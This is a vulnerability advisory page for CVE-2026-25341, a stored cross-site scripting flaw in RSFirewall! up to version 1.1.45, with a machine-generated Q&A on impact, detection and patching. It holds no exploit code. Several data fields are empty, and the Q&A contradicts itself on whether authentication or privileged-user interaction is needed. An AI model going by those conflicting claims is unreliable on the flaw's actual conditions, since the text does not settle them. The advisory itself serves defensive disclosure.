CVE-2026-25341
Stored XSS in RSJoomla! RSFirewall! Allows Persistent Script Injection
Publication date: 2026-03-25
Last updated on: 2026-04-23
Assigner: Patchstack
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| rsjoomla | rsfirewall | to 1.1.45 (inc) |
| rsjoomla | rsfirewall | From 1.1.0 (inc) to 1.1.45 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to inject and execute malicious scripts on your website.
These scripts can perform harmful actions such as redirecting visitors to malicious sites, displaying unwanted advertisements, or stealing sensitive information.
Because the malicious code executes in the context of your website, it can affect all visitors, potentially damaging your site's reputation and leading to widespread exploitation.
Exploitation does not require authentication, increasing the risk of attack.
Can you explain this vulnerability to me?
CVE-2026-25341 is a medium severity Cross Site Scripting (XSS) vulnerability affecting the WordPress RSFirewall! plugin versions up to and including 1.1.45.
This vulnerability allows attackers to inject malicious scriptsβsuch as redirects, advertisements, or other HTML payloadsβinto websites running the affected plugin.
These malicious scripts execute when visitors access the compromised site, potentially leading to widespread exploitation in mass-attack campaigns.
Exploitation requires user interaction by a privileged user, such as clicking a malicious link, visiting a crafted page, or submitting a form, although no authentication is required to initiate the attack.
The vulnerability is classified under OWASP Top 10 category A3: Injection.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability is a Stored Cross Site Scripting (XSS) issue in the RSFirewall! WordPress plugin up to version 1.1.45. Detection typically involves identifying malicious script injections in web pages generated by the affected plugin.
While no specific commands are provided in the available resources, common detection methods include scanning web pages for suspicious injected scripts or using web vulnerability scanners that detect XSS vulnerabilities.
Additionally, monitoring HTTP traffic for unusual script payloads or using security tools that can detect exploitation attempts targeting RSFirewall! plugin versions up to 1.1.45 can help identify this vulnerability.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to update the RSFirewall! plugin to version 1.1.46 or later, which contains the patch that resolves this Stored XSS vulnerability.
If immediate updating is not possible, applying the automatic mitigation rule provided by Patchstack to block attacks targeting this vulnerability is recommended.
Users unable to update or apply the mitigation rule should seek assistance from their hosting provider or web developer.
Enabling auto-update functionality for the RSFirewall! plugin can also help ensure timely protection against this and future vulnerabilities.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify how the CVE-2026-25341 vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.